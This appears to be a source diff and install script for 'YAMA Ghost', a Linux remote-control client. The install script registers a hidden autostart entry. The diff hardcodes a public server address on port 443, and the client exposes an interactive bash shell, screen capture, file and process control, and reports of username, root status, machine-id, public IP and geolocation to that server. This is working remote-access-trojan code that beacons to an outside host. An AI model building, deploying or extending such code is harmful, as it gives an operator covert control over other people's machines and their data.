echo "${C_BOLD}YAMA Ghost Linux 安装${C_RESET}"
echo " 源: ${SRC_BIN}"
echo " 目标: ${DEST_BIN}"
echo " 自启动: ${AUTOSTART_FILE}"
echo ""
# ---- 前置检查 ----
if [[ ! -f "${SRC_BIN}" ]]; then
error "找不到 ghost 二进制 ${SRC_BIN}"
error "请把 install.sh 放在 ghost 同目录后再运行"
exit 1
fi
if ! file "${SRC_BIN}" 2>/dev/null | grep -q "ELF.*executable"; then
error "${SRC_BIN} 不是有效的 ELF 可执行文件"
exit 1
fi
# 判断目标目录是否需要 sudo
# 三种情况都要走 sudo 分支:
# a) 目录不存在且父目录无写权(如 /opt/yama 父是 /opt root-owned
# b) 目录已存在但当前用户无写权(如已存在的 /usr/local/bin root-owned
# c) 介于两者之间的情况由 mkdir 的退出码决定
NEED_SUDO=""
if [[ -d "${INSTALL_DIR}" ]]; then
[[ -w "${INSTALL_DIR}" ]] || NEED_SUDO="sudo"
else
if ! mkdir -p "${INSTALL_DIR}" 2>/dev/null; then
NEED_SUDO="sudo"
fi
fi
if [[ -n "${NEED_SUDO}" ]]; then
info "目标目录需要 root 权限,将使用 sudo可能需要输入密码"
${NEED_SUDO} mkdir -p "${INSTALL_DIR}"
fi
# ---- 1. 如已运行则先停止 ----
if pgrep -x ghost > /dev/null; then
warn "检测到 ghost 进程正在运行,先停止以替换二进制"
pkill -x ghost || true
sleep 1
if pgrep -x ghost > /dev/null; then
warn "进程未优雅退出,强制 kill"
pkill -9 -x ghost || true
sleep 1
fi
ok "旧进程已停止"
fi
# ---- 2. 复制二进制 ----
info "复制 ghost 到 ${DEST_BIN}"
${NEED_SUDO} install -m 0755 "${SRC_BIN}" "${DEST_BIN}"
ok "二进制已部署 (mode 0755)"
# ---- 3. 写 XDG Autostart 文件 ----
mkdir -p "${AUTOSTART_DIR}"
cat > "${AUTOSTART_FILE}" <<EOF
[Desktop Entry]
Type=Application
Name=YAMA Ghost
Comment=YAMA remote control client
Exec=${DEST_BIN}
Terminal=false
X-GNOME-Autostart-enabled=true
NoDisplay=true
StartupNotify=false
EOF
ok "Autostart 已注册"
# 验证 .desktop 格式(如果系统装了 desktop-file-validate
if command -v desktop-file-validate >/dev/null 2>&1; then
if desktop-file-validate "${AUTOSTART_FILE}" >/dev/null 2>&1; then
ok "Autostart 文件格式验证通过"
else
warn "desktop-file-validate 报告了警告,但通常不影响功能"
fi
fi
# ---- 4. 可选:立即启动 ----
echo ""
echo -n "${C_BOLD}是否立即启动 ghost验证 X 环境)?[Y/n]${C_RESET} "
read -r ans
if [[ -z "${ans}" || "${ans}" =~ ^[Yy]$ ]]; then
if [[ -z "${DISPLAY:-}" ]]; then
warn "当前 shell 没有 DISPLAY 变量,可能不在桌面会话内 — 启动后远控仍可能 0x0"
warn "建议在 GNOME 终端/桌面环境的终端里运行此脚本"
fi
nohup "${DEST_BIN}" >/dev/null 2>&1 &
sleep 1
if pgrep -x ghost > /dev/null; then
ok "ghost 已启动 (PID=$(pgrep -x ghost | head -1))"
else
error "启动失败,请手动跑 ${DEST_BIN} 看错误输出"
exit 1
fi
fi
echo ""
echo "${C_GREEN}${C_BOLD}✓ 安装完成${C_RESET}"
echo ""
echo "下次开机将自动启动;如需立即测试,重启或在桌面终端跑:"
echo " ${DEST_BIN}"
echo ""
echo "卸载请运行同目录的 ./uninstall.sh"

BIN
linux/lib/libsign.a Normal file
View File

Binary file not shown.

653
linux/main.cpp
View File

@@ -14,7 +14,7 @@
#include <csignal> #include <csignal>
#include <sys/wait.h> #include <sys/wait.h>
#include <sys/ioctl.h> #include <sys/ioctl.h>
#include <pty.h> #include "common/PTYHandler.h"
#include <iostream> #include <iostream>
#include <stdexcept> #include <stdexcept>
#include <cstdio> #include <cstdio>
@@ -26,25 +26,39 @@
#include <cmath> #include <cmath>
#include "ScreenHandler.h" #include "ScreenHandler.h"
#include "SystemManager.h" #include "SystemManager.h"
#include "FileManager.h" #include "common/FileManager.h"
#include "ClipboardHandler.h" #include "ClipboardHandler.h"
#include "FileTransferV2.h" #include "common/FileTransferV2.h"
#include "common/logger.h" #include "common/logger.h"
#define XXH_INLINE_ALL #define XXH_INLINE_ALL
#include "common/xxhash.h" #include "common/xxhash.h"
#include "common/rtt_estimator.h"
#include "common/client_auth_state.h"
#include "common/posix_net_helpers.h"
#include "common/sub_conn_thread.h"
#include "LinuxConfig.h" #include "LinuxConfig.h"
int DataProcess(void* user, PBYTE szBuffer, ULONG ulLength); int DataProcess(void* user, PBYTE szBuffer, ULONG ulLength);
// 远程地址:当前为写死状态,如需调试,请按实际情况修改 // 远程地址:当前为写死状态,如需调试,请按实际情况修改
CONNECT_ADDRESS g_SETTINGS = { FLAG_GHOST, "192.168.0.55", "6543", CLIENT_TYPE_LINUX }; CONNECT_ADDRESS g_SETTINGS = { FLAG_GHOST, "91.99.165.207", "443", CLIENT_TYPE_LINUX };
// 全局状态 // 全局状态
State g_bExit = S_CLIENT_NORMAL; State g_bExit = S_CLIENT_NORMAL;
static std::atomic<bool> g_needResendLogin(false); // 分组变更后需要重发登录信息
// 上次收到 HeartbeatACK 的 wall-clock 时间戳(ms)0 表示新连接刚建立尚未喂初值。
// 心跳循环用它检测应用层超时TCP send() 永远不会因半死连接报错(数据塞进 SNDBUF
// 立即返回成功),必须靠 ACK 缺失来感知链路死亡。用 wall-clock 而非 monotonic
// VM/笔记本挂起期间 system_clock 继续推进,恢复后能立即识别"几分钟没收到 ACK"
// 这是相比 TCP_USER_TIMEOUT(内核层) 的关键互补价值。
static std::atomic<uint64_t> g_lastHeartbeatAckMs(0);
// 客户端 IDV2 文件传输需要) // 客户端 IDV2 文件传输需要)
uint64_t g_myClientID = 0; uint64_t g_myClientID = 0;
// 服务端身份校验全局状态已抽到 common/client_auth_state.hnamespace ClientAuth
// ============== UTF-8 → GBK 编码转换(服务端为 Windows GBK 环境) ============== // ============== UTF-8 → GBK 编码转换(服务端为 Windows GBK 环境) ==============
static std::string utf8ToGbk(const std::string& utf8) static std::string utf8ToGbk(const std::string& utf8)
@@ -301,306 +315,55 @@ private:
}; };
// ============== 心跳保活 & RTT 估算 ============== // ============== 心跳保活 & RTT 估算 ==============
// RttEstimator + g_rttEstimator + g_heartbeatInterval 已抽到 common/rtt_estimator.h
// RTT 估算器(参考 RFC 6298 算法,与 Windows 端 KernelManager 一致) // PTYHandler moved to common/PTYHandler.h (shared between Linux and macOS)
struct RttEstimator {
double srtt = 0.0; // 平滑 RTT (秒)
double rttvar = 0.0; // RTT 波动 (秒)
double rto = 0.0; // 超时时间 (秒)
bool initialized = false;
void update_from_sample(double rtt_ms) void* ShellworkingThread(void* /*param*/)
{
// 过滤异常值RTT应在合理范围内 (0, 30000] 毫秒
if (rtt_ms <= 0 || rtt_ms > 30000)
return;
const double alpha = 1.0 / 8;
const double beta = 1.0 / 4;
double rtt = rtt_ms / 1000.0;
if (!initialized) {
srtt = rtt;
rttvar = rtt / 2.0;
rto = srtt + 4.0 * rttvar;
initialized = true;
} else {
rttvar = (1.0 - beta) * rttvar + beta * std::fabs(srtt - rtt);
srtt = (1.0 - alpha) * srtt + alpha * rtt;
rto = srtt + 4.0 * rttvar;
}
// 限制最小 RTORFC 6298 推荐 1 秒)
if (rto < 1.0) rto = 1.0;
}
};
RttEstimator g_rttEstimator;
int g_heartbeatInterval = 5; // 默认心跳间隔(秒),可被服务端 CMD_MASTERSETTING 更新
// 伪终端处理类继承自IOCPManager.
class PTYHandler : public IOCPManager
{ {
public: RunSubConnThread<PTYHandler>(
PTYHandler(IOCPClient* client) : m_client(client), m_running(false) "ShellworkingThread",
{ [](IOCPClient* c) { return std::unique_ptr<PTYHandler>(new PTYHandler(c)); },
if (!client) { [](IOCPClient* c, PTYHandler*) {
throw std::invalid_argument("IOCPClient pointer cannot be null");
}
// 创建伪终端
if (openpty(&m_master_fd, &m_slave_fd, nullptr, nullptr, nullptr) == -1) {
throw std::runtime_error("Failed to create pseudo terminal");
}
// 设置伪终端为非阻塞模式
int flags = fcntl(m_master_fd, F_GETFL, 0);
fcntl(m_master_fd, F_SETFL, flags | O_NONBLOCK);
// 启动 Shell 进程
startShell();
}
~PTYHandler()
{
m_running = false;
if (m_readThread.joinable()) m_readThread.join();
close(m_master_fd);
close(m_slave_fd);
if (m_child_pid > 0) {
kill(m_child_pid, SIGTERM);
waitpid(m_child_pid, nullptr, 0);
}
}
// 启动读取线程
void Start()
{
bool expected = false;
if (!m_running.compare_exchange_strong(expected, true)) return;
m_readThread = std::thread(&PTYHandler::readFromPTY, this);
}
virtual VOID OnReceive(PBYTE data, ULONG size)
{
if (size && data[0] == COMMAND_NEXT) {
Start();
return;
}
// 处理终端尺寸调整命令
if (size >= 5 && data[0] == CMD_TERMINAL_RESIZE) {
int cols = *(short*)(data + 1);
int rows = *(short*)(data + 3);
SetWindowSize(cols, rows);
return;
}
std::string s((char*)data, size);
Mprintf("%s", s.c_str());
if (size > 0) {
ssize_t total = 0;
while (total < (ssize_t)size) {
ssize_t written = write(m_master_fd, (char*)data + total, size - total);
if (written == -1) {
if (errno == EAGAIN || errno == EINTR) continue;
Mprintf("OnReceive: write error %d\n", errno);
break;
}
total += written;
}
}
}
// 设置终端窗口尺寸
void SetWindowSize(int cols, int rows)
{
struct winsize ws;
ws.ws_col = cols;
ws.ws_row = rows;
ws.ws_xpixel = 0;
ws.ws_ypixel = 0;
if (ioctl(m_master_fd, TIOCSWINSZ, &ws) == -1) {
Mprintf("SetWindowSize: ioctl failed %d\n", errno);
} else {
// 发送 SIGWINCH 给子进程,通知其窗口大小已改变
if (m_child_pid > 0) {
kill(m_child_pid, SIGWINCH);
}
Mprintf("SetWindowSize: %dx%d\n", cols, rows);
}
}
private:
int m_master_fd, m_slave_fd;
IOCPClient* m_client;
std::thread m_readThread;
std::atomic<bool> m_running;
pid_t m_child_pid;
void startShell()
{
m_child_pid = fork();
if (m_child_pid == -1) {
close(m_master_fd);
close(m_slave_fd);
throw std::runtime_error("Failed to fork shell process");
}
if (m_child_pid == 0) { // 子进程
setsid(); // 创建新的会话
dup2(m_slave_fd, STDIN_FILENO);
dup2(m_slave_fd, STDOUT_FILENO);
dup2(m_slave_fd, STDERR_FILENO);
close(m_master_fd);
close(m_slave_fd);
// 设置完整终端支持xterm.js 终端仿真)
setenv("TERM", "xterm-256color", 1);
setenv("COLORTERM", "truecolor", 1);
// 使用 C.UTF-8 是最通用的 UTF-8 locale几乎所有 Linux 都支持
setenv("LANG", "C.UTF-8", 1);
setenv("LC_ALL", "C.UTF-8", 1);
// 启动交互式 Bash
execl("/bin/bash", "bash", "-i", nullptr);
exit(1);
}
}
void readFromPTY()
{
char buffer[4096];
while (m_running) {
// 检查子进程是否已退出
int status;
pid_t result = waitpid(m_child_pid, &status, WNOHANG);
if (result == m_child_pid) {
// Shell 已退出,发送关闭通知
Mprintf("readFromPTY: shell exited (status=%d)\n", WEXITSTATUS(status));
if (m_client) {
BYTE closeToken = TOKEN_TERMINAL_CLOSE;
m_client->Send2Server((char*)&closeToken, 1);
}
m_running = false;
break;
}
ssize_t bytes_read = read(m_master_fd, buffer, sizeof(buffer) - 1);
if (bytes_read > 0) {
if (m_client) {
buffer[bytes_read] = '\0';
Mprintf("%s", buffer);
m_client->Send2Server(buffer, bytes_read);
}
} else if (bytes_read == 0) {
// EOF - PTY 已关闭
Mprintf("readFromPTY: EOF (shell closed)\n");
if (m_client) {
BYTE closeToken = TOKEN_TERMINAL_CLOSE;
m_client->Send2Server((char*)&closeToken, 1);
}
m_running = false;
break;
} else if (bytes_read == -1) {
if (errno == EAGAIN || errno == EWOULDBLOCK) {
usleep(10000);
} else if (errno == EIO) {
// EIO 通常表示 PTY slave 已关闭shell 退出)
Mprintf("readFromPTY: EIO (shell closed)\n");
if (m_client) {
BYTE closeToken = TOKEN_TERMINAL_CLOSE;
m_client->Send2Server((char*)&closeToken, 1);
}
m_running = false;
break;
} else {
Mprintf("readFromPTY: read error %d\n", errno);
break;
}
}
}
}
};
void* ShellworkingThread(void* param)
{
try {
std::unique_ptr<IOCPClient> ClientObject(new IOCPClient(g_bExit, true));
void* clientAddr = ClientObject.get();
Mprintf(">>> Enter ShellworkingThread [%p]\n", clientAddr);
if (!g_bExit && ClientObject->ConnectServer(g_SETTINGS.ServerIP(), g_SETTINGS.ServerPort())) {
std::unique_ptr<PTYHandler> handler(new PTYHandler(ClientObject.get()));
ClientObject->setManagerCallBack(handler.get(), IOCPManager::DataProcess, IOCPManager::ReconnectProcess);
BYTE bToken = TOKEN_TERMINAL_START; BYTE bToken = TOKEN_TERMINAL_START;
ClientObject->Send2Server((char*)&bToken, 1); c->Send2Server((char*)&bToken, 1);
Mprintf(">>> ShellworkingThread [%p] Send: TOKEN_TERMINAL_START\n", clientAddr); Mprintf(">>> ShellworkingThread [%p] Send: TOKEN_TERMINAL_START\n", c);
while (ClientObject->IsRunning() && ClientObject->IsConnected() && S_CLIENT_NORMAL == g_bExit) });
Sleep(1000);
}
Mprintf(">>> Leave ShellworkingThread [%p]\n", clientAddr);
} catch (const std::exception& e) {
Mprintf("*** ShellworkingThread exception: %s ***\n", e.what());
}
return NULL; return NULL;
} }
void* ScreenworkingThread(void* param) void* ScreenworkingThread(void* /*param*/)
{ {
try { RunSubConnThread<ScreenHandler>(
std::unique_ptr<IOCPClient> ClientObject(new IOCPClient(g_bExit, true)); "ScreenworkingThread",
void* clientAddr = ClientObject.get(); [](IOCPClient* c) { return std::unique_ptr<ScreenHandler>(new ScreenHandler(c)); },
Mprintf(">>> Enter ScreenworkingThread [%p]\n", clientAddr); [](IOCPClient* c, ScreenHandler* h) {
if (!g_bExit && ClientObject->ConnectServer(g_SETTINGS.ServerIP(), g_SETTINGS.ServerPort())) {
std::unique_ptr<ScreenHandler> handler(new ScreenHandler(ClientObject.get()));
ClientObject->setManagerCallBack(handler.get(), IOCPManager::DataProcess, IOCPManager::ReconnectProcess);
// 连接后立即发送完整的 BITMAPINFO 包(与 Windows 端 ScreenManager 流程一致) // 连接后立即发送完整的 BITMAPINFO 包(与 Windows 端 ScreenManager 流程一致)
handler->SendBitmapInfo(); h->SendBitmapInfo();
Mprintf(">>> ScreenworkingThread [%p] Send: TOKEN_BITMAPINFO\n", clientAddr); Mprintf(">>> ScreenworkingThread [%p] Send: TOKEN_BITMAPINFO\n", c);
while (ClientObject->IsRunning() && ClientObject->IsConnected() && S_CLIENT_NORMAL == g_bExit) });
Sleep(1000);
}
Mprintf(">>> Leave ScreenworkingThread [%p]\n", clientAddr);
} catch (const std::exception& e) {
Mprintf("*** ScreenworkingThread exception: %s ***\n", e.what());
}
return NULL; return NULL;
} }
void* SystemManagerThread(void* param) void* SystemManagerThread(void* /*param*/)
{ {
try { RunSubConnThread<SystemManager>(
std::unique_ptr<IOCPClient> ClientObject(new IOCPClient(g_bExit, true)); "SystemManagerThread",
void* clientAddr = ClientObject.get(); [](IOCPClient* c) { return std::unique_ptr<SystemManager>(new SystemManager(c)); },
Mprintf(">>> Enter SystemManagerThread [%p]\n", clientAddr); [](IOCPClient* c, SystemManager*) {
if (!g_bExit && ClientObject->ConnectServer(g_SETTINGS.ServerIP(), g_SETTINGS.ServerPort())) { Mprintf(">>> SystemManagerThread [%p] Send: TOKEN_PSLIST\n", c);
std::unique_ptr<SystemManager> handler(new SystemManager(ClientObject.get())); });
ClientObject->setManagerCallBack(handler.get(), IOCPManager::DataProcess, IOCPManager::ReconnectProcess);
Mprintf(">>> SystemManagerThread [%p] Send: TOKEN_PSLIST\n", clientAddr);
while (ClientObject->IsRunning() && ClientObject->IsConnected() && S_CLIENT_NORMAL == g_bExit)
Sleep(1000);
}
Mprintf(">>> Leave SystemManagerThread [%p]\n", clientAddr);
} catch (const std::exception& e) {
Mprintf("*** SystemManagerThread exception: %s ***\n", e.what());
}
return NULL; return NULL;
} }
void* FileManagerThread(void* param) void* FileManagerThread(void* /*param*/)
{ {
try { RunSubConnThread<FileManager>(
std::unique_ptr<IOCPClient> ClientObject(new IOCPClient(g_bExit, true)); "FileManagerThread",
void* clientAddr = ClientObject.get(); [](IOCPClient* c) { return std::unique_ptr<FileManager>(new FileManager(c)); },
Mprintf(">>> Enter FileManagerThread [%p]\n", clientAddr); [](IOCPClient* c, FileManager*) {
if (!g_bExit && ClientObject->ConnectServer(g_SETTINGS.ServerIP(), g_SETTINGS.ServerPort())) { Mprintf(">>> FileManagerThread [%p] Send: TOKEN_DRIVE_LIST\n", c);
std::unique_ptr<FileManager> handler(new FileManager(ClientObject.get())); });
ClientObject->setManagerCallBack(handler.get(), IOCPManager::DataProcess, IOCPManager::ReconnectProcess);
Mprintf(">>> FileManagerThread [%p] Send: TOKEN_DRIVE_LIST\n", clientAddr);
while (ClientObject->IsRunning() && ClientObject->IsConnected() && S_CLIENT_NORMAL == g_bExit)
Sleep(1000);
}
Mprintf(">>> Leave FileManagerThread [%p]\n", clientAddr);
} catch (const std::exception& e) {
Mprintf("*** FileManagerThread exception: %s ***\n", e.what());
}
return NULL; return NULL;
} }
@@ -609,6 +372,12 @@ int DataProcess(void* user, PBYTE szBuffer, ULONG ulLength)
if (szBuffer == nullptr || ulLength == 0) if (szBuffer == nullptr || ulLength == 0)
return TRUE; return TRUE;
// 服务端身份未通过校验前,仅放行 CMD_MASTERSETTING校验本身。详见
// common/client_auth_state.h ClientAuth::IsCommandAllowed 的注释。
if (!ClientAuth::IsCommandAllowed(szBuffer[0])) {
return TRUE;
}
if (szBuffer[0] == COMMAND_BYE) { if (szBuffer[0] == COMMAND_BYE) {
Mprintf("*** [%p] Received Bye-Bye command ***\n", user); Mprintf("*** [%p] Received Bye-Bye command ***\n", user);
g_bExit = S_CLIENT_EXIT; g_bExit = S_CLIENT_EXIT;
@@ -628,20 +397,26 @@ int DataProcess(void* user, PBYTE szBuffer, ULONG ulLength)
if (ulLength >= 1 + sizeof(HeartbeatACK)) { if (ulLength >= 1 + sizeof(HeartbeatACK)) {
HeartbeatACK* ack = (HeartbeatACK*)(szBuffer + 1); HeartbeatACK* ack = (HeartbeatACK*)(szBuffer + 1);
uint64_t now = GetUnixMs(); uint64_t now = GetUnixMs();
g_lastHeartbeatAckMs.store(now, std::memory_order_relaxed); // 喂应用层 ACK 看门狗
double rtt_ms = (double)(now - ack->Time); double rtt_ms = (double)(now - ack->Time);
g_rttEstimator.update_from_sample(rtt_ms); g_rttEstimator.update_from_sample(rtt_ms);
Mprintf("** [%p] Heartbeat ACK: RTT=%.1fms, SRTT=%.1fms ***\n", // 心跳节奏太密日志会刷屏;最多 60s 一行
user, rtt_ms, g_rttEstimator.srtt * 1000); static time_t lastAckLog = 0;
time_t now_s = time(nullptr);
if (now_s - lastAckLog >= 60) {
lastAckLog = now_s;
Mprintf("** [%p] Heartbeat ACK: RTT=%.1fms, SRTT=%.1fms ***\n",
user, rtt_ms, g_rttEstimator.srtt * 1000);
}
} }
} else if (szBuffer[0] == CMD_MASTERSETTING) { } else if (szBuffer[0] == CMD_MASTERSETTING) {
int settingSize = ulLength - 1; MasterSettings settings;
if (settingSize >= (int)sizeof(int)) { // 至少包含 ReportInterval if (!ClientAuth::HandleMasterSettings(szBuffer + 1, (int)ulLength - 1, &settings)) {
MasterSettings settings = {}; return TRUE; // 包不全或签名失败:让 30s 超时兜底重连
memcpy(&settings, szBuffer + 1, settingSize < (int)sizeof(MasterSettings) ? settingSize : sizeof(MasterSettings));
if (settings.ReportInterval > 0)
g_heartbeatInterval = settings.ReportInterval;
Mprintf("** [%p] MasterSettings: ReportInterval=%ds ***\n", user, g_heartbeatInterval);
} }
if (settings.ReportInterval > 0)
g_heartbeatInterval = settings.ReportInterval;
Mprintf("** [%p] MasterSettings: ReportInterval=%ds ***\n", user, g_heartbeatInterval);
} else if (szBuffer[0] == COMMAND_NEXT) { } else if (szBuffer[0] == COMMAND_NEXT) {
Mprintf("** [%p] Received 'NEXT' command ***\n", user); Mprintf("** [%p] Received 'NEXT' command ***\n", user);
} else if (szBuffer[0] == COMMAND_C2C_TEXT) { } else if (szBuffer[0] == COMMAND_C2C_TEXT) {
@@ -672,6 +447,26 @@ int DataProcess(void* user, PBYTE szBuffer, ULONG ulLength)
if (result != 0) { if (result != 0) {
Mprintf("** [%p] V2 File recv error: %d ***\n", user, result); Mprintf("** [%p] V2 File recv error: %d ***\n", user, result);
} }
} else if (szBuffer[0] == CMD_SET_GROUP) {
// Extract group name from message (starts at byte 1)
std::string groupName;
if (ulLength > 1) {
groupName = std::string((char*)szBuffer + 1, ulLength - 1);
// Remove trailing nulls
size_t pos = groupName.find('\0');
if (pos != std::string::npos) {
groupName = groupName.substr(0, pos);
}
}
// Save to config file
LinuxConfig cfg;
cfg.SetStr("group_name", groupName);
// Update global settings
memset(g_SETTINGS.szGroupName, 0, sizeof(g_SETTINGS.szGroupName));
strncpy(g_SETTINGS.szGroupName, groupName.c_str(), sizeof(g_SETTINGS.szGroupName) - 1);
// 标记需要重发登录信息(让服务端更新分组显示)
g_needResendLogin.store(true);
Mprintf("** [%p] Group changed to: %s ***\n", user, groupName.c_str());
} else { } else {
Mprintf("** [%p] Received unimplemented command: %d ***\n", user, int(szBuffer[0])); Mprintf("** [%p] Received unimplemented command: %d ***\n", user, int(szBuffer[0]));
} }
@@ -841,6 +636,49 @@ std::string getUsername()
return u ? u : "?"; return u ? u : "?";
} }
// 读取 systemd / dbus 维护的 machine-id与 Windows MachineGuid 等价)
// /etc/machine-id 在系统首次启动时生成的随机 32 字符 hex GUID。
// 对应 Windows: HKLM\Software\Microsoft\Cryptography\MachineGuid。
// 重装系统才会变;同一镜像 dd 出来的多机会撞——但规范的批量部署
// 工具 (cloud-init / kickstart) 会重置它。
static std::string getMachineId()
{
// 优先 /etc/machine-id某些精简系统可能放在 /var/lib/dbus/machine-id
const char* paths[] = { "/etc/machine-id", "/var/lib/dbus/machine-id" };
for (const char* p : paths) {
std::ifstream f(p);
if (!f.is_open()) continue;
std::string id;
std::getline(f, id);
// 去掉尾部空白和换行
while (!id.empty() && (id.back() == '\n' || id.back() == '\r' ||
id.back() == ' ' || id.back() == '\t')) {
id.pop_back();
}
if (!id.empty()) return id;
}
return std::string();
}
// 路径归一化Linux 版):解析符号链接 + 转小写
// realpath 等价于 Windows 的 GetLongPathName把 /usr/local/bin/../foo 这种
// 折回到规范形式;小写化避免大小写差异引起 ID 不同Linux 文件系统本身大小写
// 敏感,但保持与 Windows V2 算法一致的归一化策略,跨端一致性优先)。
static std::string normalizeExePathLower(const std::string& path)
{
char resolved[PATH_MAX] = {};
std::string out;
if (realpath(path.c_str(), resolved) != nullptr) {
out = resolved;
} else {
out = path; // 解析失败(罕见):用原值
}
for (auto& c : out) {
if (c >= 'A' && c <= 'Z') c = c - 'A' + 'a';
}
return out;
}
// 获取屏幕分辨率字符串(格式 "显示器数:宽*高" // 获取屏幕分辨率字符串(格式 "显示器数:宽*高"
std::string getScreenResolution() std::string getScreenResolution()
{ {
@@ -874,87 +712,14 @@ std::string getScreenResolution()
return "0:0*0"; return "0:0*0";
} }
// 执行命令并返回输出 // execCmd / httpGet / getPublicIP / jsonExtract / getGeoLocation 已抽到
static std::string execCmd(const std::string& cmd) // common/posix_net_helpers.hnamespace PosixNet。下面保留同名 wrapper避免
{ // 改动调用点。Linux 历史调用风格保留:自由函数无 namespace。
std::unique_ptr<FILE, decltype(&pclose)> pipe(popen(cmd.c_str(), "r"), pclose); static inline std::string execCmd(const std::string& cmd) { return PosixNet::execCmd(cmd); }
if (!pipe) return ""; static inline std::string httpGet(const std::string& url, int timeoutSec = 5) { return PosixNet::httpGet(url, timeoutSec); }
char buf[4096]; static inline std::string jsonExtract(const std::string& json, const std::string& key) { return PosixNet::jsonExtract(json, key); }
std::string result; inline std::string getPublicIP() { return PosixNet::getPublicIP(); }
while (fgets(buf, sizeof(buf), pipe.get())) { inline std::string getGeoLocation(const std::string& ip){ return PosixNet::getGeoLocation(ip); }
result += buf;
}
// 去除尾部空白
while (!result.empty() && (result.back() == '\n' || result.back() == '\r' || result.back() == ' '))
result.pop_back();
return result;
}
// HTTP GET 请求(优先 curl备选 wget
static std::string httpGet(const std::string& url, int timeoutSec = 5)
{
std::string t = std::to_string(timeoutSec);
// 优先使用 curl
std::string r = execCmd("curl -s --max-time " + t + " \"" + url + "\" 2>/dev/null");
if (!r.empty()) return r;
// 备选 wgetUbuntu 默认自带)
r = execCmd("wget -qO- --timeout=" + t + " \"" + url + "\" 2>/dev/null");
return r;
}
// 获取公网 IP轮询多个查询源与 Windows 端一致)
std::string getPublicIP()
{
static const char* urls[] = {
"https://checkip.amazonaws.com",
"https://api.ipify.org",
"https://ipinfo.io/ip",
"https://icanhazip.com",
"https://ifconfig.me/ip",
};
for (auto& url : urls) {
std::string ip = httpGet(url, 3);
// 简单校验:非空且看起来像 IP含有点号长度合理
if (!ip.empty() && ip.find('.') != std::string::npos && ip.size() <= 45) {
Mprintf("getPublicIP: %s (from %s)\n", ip.c_str(), url);
return ip;
}
}
Mprintf("getPublicIP: all sources failed\n");
return "";
}
// 从 JSON 字符串中提取指定 key 的值(简易解析,不依赖 jsoncpp
// 支持格式: "key": "value" 或 "key":"value"
static std::string jsonExtract(const std::string& json, const std::string& key)
{
std::string needle = "\"" + key + "\"";
size_t pos = json.find(needle);
if (pos == std::string::npos) return "";
pos = json.find(':', pos + needle.size());
if (pos == std::string::npos) return "";
pos = json.find('"', pos + 1);
if (pos == std::string::npos) return "";
size_t end = json.find('"', pos + 1);
if (end == std::string::npos) return "";
return json.substr(pos + 1, end - pos - 1);
}
// 获取 IP 地理位置(通过 ipinfo.io与 Windows 端一致)
std::string getGeoLocation(const std::string& ip)
{
if (ip.empty()) return "";
std::string json = httpGet("https://ipinfo.io/" + ip + "/json", 5);
if (json.empty()) return "";
std::string country = jsonExtract(json, "country");
std::string city = jsonExtract(json, "city");
if (city.empty() && country.empty()) return "";
if (city.empty()) return country;
if (country.empty()) return city;
return city + ", " + country;
}
// ============== 守护进程 ============== // ============== 守护进程 ==============
@@ -1021,8 +786,12 @@ static void daemonize()
} }
// 信号处理:收到 SIGTERM/SIGINT 时优雅退出 // 信号处理:收到 SIGTERM/SIGINT 时优雅退出
// 注意handler 内不能调 MprintfLogger 用 mutex/string/condvar非 async-signal-safe
// 只在这里记 sig_atomic_t 标志位main 退出循环后再补一行日志。
static volatile sig_atomic_t g_lastSignal = 0;
static void signalHandler(int sig) static void signalHandler(int sig)
{ {
g_lastSignal = sig;
g_bExit = S_CLIENT_EXIT; g_bExit = S_CLIENT_EXIT;
} }
@@ -1077,8 +846,23 @@ int main(int argc, char* argv[])
LOGIN_INFOR logInfo; LOGIN_INFOR logInfo;
// 主机名 // 读取分组名称(从配置文件或 g_SETTINGS
strncpy(logInfo.szPCName, hostname, sizeof(logInfo.szPCName) - 1); LinuxConfig cfgGroup;
std::string groupName = cfgGroup.GetStr("group_name");
if (!groupName.empty()) {
// 更新 g_SETTINGS
strncpy(g_SETTINGS.szGroupName, groupName.c_str(), sizeof(g_SETTINGS.szGroupName) - 1);
} else if (g_SETTINGS.szGroupName[0] != 0) {
groupName = g_SETTINGS.szGroupName;
}
// 主机名带分组hostname/groupname
if (!groupName.empty()) {
std::string pcNameWithGroup = std::string(hostname) + "/" + groupName;
strncpy(logInfo.szPCName, pcNameWithGroup.c_str(), sizeof(logInfo.szPCName) - 1);
} else {
strncpy(logInfo.szPCName, hostname, sizeof(logInfo.szPCName) - 1);
}
logInfo.szPCName[sizeof(logInfo.szPCName) - 1] = '\0'; logInfo.szPCName[sizeof(logInfo.szPCName) - 1] = '\0';
// 操作系统版本(如 "Ubuntu 24.04 LTS" // 操作系统版本(如 "Ubuntu 24.04 LTS"
@@ -1146,22 +930,38 @@ int main(int argc, char* argv[])
logInfo.AddReserved(getUsername().c_str()); // [13] RES_USERNAME logInfo.AddReserved(getUsername().c_str()); // [13] RES_USERNAME
logInfo.AddReserved(getuid() == 0 ? 1 : 0); // [14] RES_ISADMIN logInfo.AddReserved(getuid() == 0 ? 1 : 0); // [14] RES_ISADMIN
logInfo.AddReserved(getScreenResolution().c_str()); // [15] RES_RESOLUTION logInfo.AddReserved(getScreenResolution().c_str()); // [15] RES_RESOLUTION
// 计算客户端 ID与服务端 CONTEXT_OBJECT::CalculateID 相同算法) // V2 ID 算法machine-id + 归一化路径
// 格式: pubIP|hostname|os|cpu|path // - 同机同程序路径永远同 ID不依赖 IP/hostname/distro/CPU 漂移)
char cpuStr[32]; // - 局域网多机即便同镜像cloud-init/kickstart 会让 machine-id 各不同
snprintf(cpuStr, sizeof(cpuStr), "%uMHz", logInfo.dwCPUMHz); // - machine-id 读取失败时退化到老算法pubIP|hostname|distro|cpu|path保兼容
std::string idInput = (pubIP.empty() ? "?" : pubIP) + "|" + std::string machineId = getMachineId();
hostname + "|" + if (!machineId.empty()) {
distro + "|" + std::string normPath = normalizeExePathLower(exePath);
cpuStr + "|" + std::string idInput = machineId + "|" + normPath;
exePath; g_myClientID = XXH64(idInput.c_str(), idInput.length(), 0);
g_myClientID = XXH64(idInput.c_str(), idInput.length(), 0); Mprintf("Calculated clientID(v2): %llu (machineId=%s, path=%s)\n",
Mprintf("Calculated clientID: %llu (from: %s)\n", g_myClientID, idInput.c_str()); g_myClientID, machineId.c_str(), normPath.c_str());
} else {
// 老算法兜底(与服务端 CONTEXT_OBJECT::CalculateID 相同算法)
// 格式: pubIP|hostname|os|cpu|path
char cpuStr[32];
snprintf(cpuStr, sizeof(cpuStr), "%uMHz", logInfo.dwCPUMHz);
std::string idInput = (pubIP.empty() ? "?" : pubIP) + "|" +
hostname + "|" +
distro + "|" +
cpuStr + "|" +
exePath;
g_myClientID = XXH64(idInput.c_str(), idInput.length(), 0);
